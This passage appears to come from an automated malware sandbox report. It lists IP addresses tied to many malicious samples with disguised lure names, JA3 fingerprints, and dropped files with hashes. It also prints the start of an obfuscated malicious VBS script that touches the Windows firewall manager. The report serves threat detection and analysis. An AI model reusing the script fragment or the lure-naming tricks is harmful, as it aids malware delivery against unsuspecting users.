                                                                                                                                                        • 202.71.109.165
                                                                                                                                                        K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                                                                                        • 112.137.173.77
                                                                                                                                                        PUBLIC-DOMAIN-REGISTRYUSv4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 208.91.198.106
                                                                                                                                                        Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 119.18.54.39
                                                                                                                                                        List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        s0zqlmETpm.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 216.10.240.70
                                                                                                                                                        Quote_8714.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 199.79.62.115
                                                                                                                                                        S1a5ZF3ytp.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 216.10.240.70
                                                                                                                                                        UUNETUSsparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 71.171.80.161
                                                                                                                                                        0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 45.149.241.141
                                                                                                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 62.22.186.203
                                                                                                                                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 63.11.152.106
                                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 108.5.239.250
                                                                                                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 108.39.235.151
                                                                                                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 173.74.165.171
                                                                                                                                                        2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 193.133.159.199
                                                                                                                                                        arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 209.205.60.100
                                                                                                                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 141.157.175.202
                                                                                                                                                        RAMNODEUSraEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.161.23.150

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eraEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 103.53.42.63
                                                                                                                                                        • 107.161.23.150
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        main.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        deb.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                        • 202.71.109.228

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                        Entropy (8bit):1.3073696514069466
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr5:KooCEYhgYEL0In
                                                                                                                                                        MD5:3EEF7E33F4E9633DE64291D86B408E44
                                                                                                                                                        SHA1:C5CE06F32BFF105199E0B8FCD0B54B7807F9110B
                                                                                                                                                        SHA-256:8FA1DD8D470B4D6EFFEF47DEEFD431F77A6B560F0467E0F41C82F89B7789B029
                                                                                                                                                        SHA-512:C0F717089D9EA52ABD07E062A42871C2FF99E667E9F826715112FCB7156A89D574DBCC62279C6CEBC6E7A8304CA7B57388917A0EBF97F6085907800A56D662D6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf8124d46, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1310720
                                                                                                                                                        Entropy (8bit):0.4221732383621877
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
                                                                                                                                                        MD5:E73A71633FF84E5EF00FAFE213B4504F
                                                                                                                                                        SHA1:2031D44C8C4D13ABD5927E3D11A094561AB2DDD6
                                                                                                                                                        SHA-256:EEA296484B4998D99641AE7778A9FB73C7E307A1AA74256F0F80D5A403C6F8B7
                                                                                                                                                        SHA-512:7812F41E61CDFA276E4252C9F558683DD7F784CE2E2FD013D6A8D5AB6F0F9465722B3A3811796262F934D3321C33156FCF63345BEB3E5C902F3B132ED4F1653C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..MF... .......A.......X\...;...{......................0.!..........{A..3...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................;...3...|....................(..3...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16384
                                                                                                                                                        Entropy (8bit):0.07723066764839415
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:/OmUYeHEkrCjn13a/7W53+vollcVO/lnlZMxZNQl:/JUzH453q07Oewk
                                                                                                                                                        MD5:E065F7F195443CDB1F142DEEA4BDE6A6
                                                                                                                                                        SHA1:B0B6000639B9FA45F416B3713429EB9CD95C3944
                                                                                                                                                        SHA-256:5C7D62FFB897A7039564B7F987B28DD83E7852F5C1A2211ADB1DE17053615665
                                                                                                                                                        SHA-512:311A9456F1EE02160B2BBE45865D867705EDDB4E8D41E7EA4BCE6104E9885CAB2F3788A4CC3C702FA5002AA576394422764E2549A85C058B101B9B0B3A910658
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:1........................................;...{...3...|.......{A..............{A......{A..........{A]..................(..3...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\Public\k9o5xs1hnem9ja8a.vbs

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):29579
                                                                                                                                                        Entropy (8bit):5.204170965038756
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:RoOYipQPhx2CivOoqu2diFwy8o7KUxWV09Sj6R8S/EF3Yl745zTMdK1dD5FSIUA7:R9pQTS8pVf63upVYMvfuXWPKS4aHg8nD
                                                                                                                                                        MD5:623C703E541FEF627956FC12F65A10F7
                                                                                                                                                        SHA1:168C99DFCBE191B37CD76B7D982FCA23BD673882
                                                                                                                                                        SHA-256:48932DC695B2D3A3C7384C2E07E7312F17DCB33882805EA14B1EF8C694A7D6AC
                                                                                                                                                        SHA-512:8121D245039257A27CBCF0FBA78600A54955E2C331F0EFC63A5EEB18DCEE1ACF1F0554774244E71DEC50743740272A44DD6656A47FD9747B030AE26B0227C214
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:....Private Const Kiloenes = &H2364..Private Const Programdiskens = &HFFFF3C0C..Private Const Reliances = -10676..Private Const Roodle = "Nonsyncopation; flibbertigibbet."..Private Const Snitsaar = "Farmerne sammensyningens"..Private Const Unsupervised = "inequitably dactylic,"..Private Const Resiling = 60139..Private Const Aarhusianerne = &HFFFF5AFB..Private Const hvidvinen = "Smidiggrelsers dispositionsnummereringernes"..Private Const solskinsdage = "certificeredes? unsmokable?"..Private Const Openness = -10018..Private Const Repay = "Paruras animeringerne65"..........Set Schizorhinal211 = CreateObject("HNetCfg.FwMgr")....Set Ugsomely = Schizorhinal211.LocalPolicy.CurrentProfile....Set Futurummerne = Ugsomely.ICMPSettings........'Unostentatiousness? unhard desorbable infinitiv; echidnehesperides........'Overwomanise130. jerngitterseng:..Function Sharesman ()....For I = 1566 To 84 step - 1..Unstrictured = Unstrictured & "Hjertekardiogrammer"..next....Calliperer213 = Calliperer213 & ";

                                                                                                                                                        C:\Users\Public\pqg5u7vt.doc

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Pietro Perelli- Steeltrade Srl, Template: Normal.dotm, Last Saved By: Pietro Perelli- Steeltrade Srl, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Wed Dec 11 15:07:00 2024, Last Saved Time/Date: Wed Dec 11 15:09:00 2024, Number of Pages: 1, Number of Words: 39, Number of Characters: 224, Security: 0
                                                                                                                                                        Category:modified
                                                                                                                                                        Size (bytes):29184
                                                                                                                                                        Entropy (8bit):2.9417810913356135
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:ETN4ZEvAqf0g7K6/6rJ984woO+QHj1GpLYQg:qoiSJPw+QD1Gp
                                                                                                                                                        MD5:16EF383D209324DA590213E9634FDDDF
                                                                                                                                                        SHA1:53A8316279661D9DF0D64D004DD7ABF667A4A547
                                                                                                                                                        SHA-256:AAF9885EBACFAB6CFF8111D142C6D54E307791C929C9891441C1A9A9A9392A47
                                                                                                                                                        SHA-512:908F68773DEC17558D5D553FD8A31D3B24584524AB18A89B3970F53C0BCE2E20EBF66D2BEB4F49079DA51B2C4AC8CF22196AF4DA5198F2156958466FCF866715
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:......................>.......................4...........6...............3......................................................................................................................................................................................................................................................................................................................................................................................................................................................k.............................bjbj..............................,j.,j..................................................................................r.......r...........................................................................................%...............' ..p...1.......1.......1.......1.......1........................................................................................!......M$............................................................................

                                                                                                                                                        C:\Users\Public\~$g5u7vt.doc

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):162
                                                                                                                                                        Entropy (8bit):2.550390878129965
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:5LEwblllW6C+/tI/vlllfllrYLaaR1:lV/X1h
                                                                                                                                                        MD5:D84684CD97DD42F89BBD797D5489EF55
                                                                                                                                                        SHA1:9F3F8CB9281B5049B8F28F14B881ED5231E7D091
                                                                                                                                                        SHA-256:9AEA2C5220768F58221BAF8567737D8CEF750BBBECB22DA1C7786876E4B5A65B
                                                                                                                                                        SHA-512:5C73625985D526E366C6974C0F775BB51C5734852F316794B52CB5A17602115467B83EC47A8ADD653AE72E2B0F965286EA25C98F280A71045045355D4ABED788
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:..........................................................pU...a.fX....U.......I.'....@Y^..a.f.............................................I.'4...}..f....@V...=.f

                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):71954
                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Windows\System32\wscript.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):328
                                                                                                                                                        Entropy (8bit):3.247897867253901
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:kKM3D9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:UqDImsLNkPlE99SNxAhUe/3
                                                                                                                                                        MD5:68F67F9067C27A424565CC769E23E375
                                                                                                                                                        SHA1:BBF7D7DFC269EBFB6095C4EC52E6C07EBBC43456
                                                                                                                                                        SHA-256:3A9843617EBC7AE51360EA27687A90F14D770A726C9819E482C96FE297FA6572
                                                                                                                                                        SHA-512:F7742DE34DC815A5A26BF392645BBF490C28BA481CFD9659F2563C66A574266BE14EB11E8C253519DFF135C962E1CAFBA35D6580A20468BA68C232217647A0DC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:p...... ..........C@.R..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (1869), with no line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1869
                                                                                                                                                        Entropy (8bit):5.091287881393181
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:cG3JFnzyr3InzysWkSyrWgdnzyrXHnzyMySyKUdSyqIASyE/dyDhdyBkJdyVYdyO:hF27I2sVbKgd2rH2MybKUdbqIAbE/ED3
                                                                                                                                                        MD5:6890609393F00696E1788F5AB5600073
                                                                                                                                                        SHA1:03669FAC84F9265081A924D7B37E9F519941DAA4
                                                                                                                                                        SHA-256:9CB374EC508DA3E204FB0AAA7FA2986354E66D8529F83C4D436DB96E12B7702C
                                                                                                                                                        SHA-512:FD6DE631AD5C3EF4E228DB873887C54AA7F779FCC2B3149DEA21BD8A132A5360322A5D9B2A88595E0C0840E08E282E69EB1B5F278F85448D0F8E3BAFB71C29CC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>12</Count><Resource><Id>Aptos Display_45876482</Id><LAT>2023-10-04T10:58:38Z</LAT><key>29442803203.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_45876480</Id><LAT>2023-10-04T10:58:38Z</LAT><key>30264859306.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215426</Id><LAT>2023-10-04T10:58:38Z</LAT><key>37262344671.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2024-12-19T11:51:21Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215682</Id><LAT>2023-10-04T10:58:38Z</LAT><key>28367963232.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-04T10:58:38Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:JSON data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):521377
                                                                                                                                                        Entropy (8bit):4.9084889265453135
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                                                                                        MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                                                                                        SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                                                                                        SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                                                                                        SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):773040
                                                                                                                                                        Entropy (8bit):6.55939673749297
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                                                                                        MD5:4296A064B917926682E7EED650D4A745
                                                                                                                                                        SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                                                                                        SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                                                                                        SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2278
                                                                                                                                                        Entropy (8bit):3.8619193216811754
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:uiTrlKxsxxYxl9Il8utslo4sXFkZirxRsHAkaGdvYNQzd1rc:vkYrUSXQmMYMYNQU
                                                                                                                                                        MD5:89F69315C60FDED58D2BFCA55B242AE3
                                                                                                                                                        SHA1:061E03414599CEE19A8FCE774DBD802F8176563F
                                                                                                                                                        SHA-256:BDFD061C043CF92295A06C4F0C87F022C346725030F563174AE46DC7D2E87964
                                                                                                                                                        SHA-512:47B1399E65E06BA065772B054D665342AA06F09D9B9CA955A709928E099BE8809835F9150EF39F2EF6BC113FE965A2AACF018B7D3083C8DFEA9B2AC8CE9964B2
                                                                                                                                                        Malicious:false
